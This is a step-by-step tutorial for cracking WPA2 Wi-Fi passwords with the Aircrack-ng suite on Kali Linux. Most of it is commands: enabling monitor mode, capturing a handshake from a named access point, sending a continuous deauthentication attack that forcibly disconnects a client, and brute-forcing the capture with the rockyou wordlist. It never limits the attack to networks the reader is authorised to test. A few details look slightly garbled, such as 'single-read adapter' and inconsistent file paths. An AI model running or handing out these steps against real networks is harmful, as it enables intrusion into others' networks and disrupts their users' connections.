Cracking Wi‑Fi Passwords with Aircrack‑ng on Kali Linux

1. Check network interfaces

Run iwconfig to list wireless devices. Look for wlan0 or, on some machines, a single‑read adapter like wlan1 .

iwconfig

2. Start monitor mode

Enable monitoring on the interface with: airmon-ng start wlan0 After the command, run iwconfig again; you should see wlan0mon , indicating the interface is now in monitor mode.

3. Scan nearby networks

Use airodump-ng wlan0mon to list access points and associated clients. If the channel is wrong or no networks appear, the hardware may be faulty, and you might need to switch to a USB wireless adapter (e.g., wlan1 ). airodump-ng wlan0mon The scan displays two tables that refresh continuously:

BSSID : AP hardware address

PWR : Signal strength (negative value, closer to zero is stronger)

CH : Channel

ENC : Encryption type (targeting WPA2)

ESSID : Network name

STATION : Client hardware address

4. Capture handshake packets

Start a capture on a specific AP using its BSSID and channel, saving the output to a file:

airodump-ng --bssid DC:FE:18:AE:12:3A -c 1 -w /home/wifi wlan1

The captured file (e.g., wifi-01.cap) will contain the WPA handshake once a client connects.

5. Trigger a handshake

Open another terminal and launch a deauthentication attack to force a client to reconnect, capturing the handshake:

aireplay-ng -0 0 -c F8:A2:D6:B9:13:C5 -a DC:FE:18:AE:12:3A wlan1

When airodump-ng shows WPA handshake: DC:FE:18:AE:12:3A, press Ctrl+C to stop the capture.

6. Perform a dictionary attack

Use Aircrack‑ng with a wordlist (Kali’s default /usr/share/wordlists/rockyou.txt) to try cracking the captured handshake:

aircrack-ng -w /usr/share/wordlists/rockyou.txt /home/wifi-01.cap

The process may take a long time; it will either reveal the password or fail, in which case a different wordlist is needed.

7. Change channel (optional)

iwconfig wlan1 channel 7

This guide assumes Aircrack‑ng is already installed on the Kali system.